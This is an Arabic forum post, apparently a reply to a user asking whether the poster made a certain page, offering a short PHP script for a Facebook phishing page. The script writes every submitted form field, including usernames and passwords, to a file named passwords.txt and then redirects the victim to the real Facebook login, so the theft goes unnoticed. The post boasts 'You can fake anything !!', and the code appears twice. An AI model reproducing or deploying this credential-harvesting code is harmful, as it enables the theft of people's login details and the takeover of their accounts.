عدد النقاط : 10
اقتباس المشاركة الأصلية كتبت بواسطة PASSEWORD السلام عليكم هل انت من برمج الصفحة This is my answer : كود PHP: <?php header("Location: http://www.Facebook.com/login.php"); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> You can fake anything !!
<?php header("Location: http://www.Facebook.com/login.php"); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>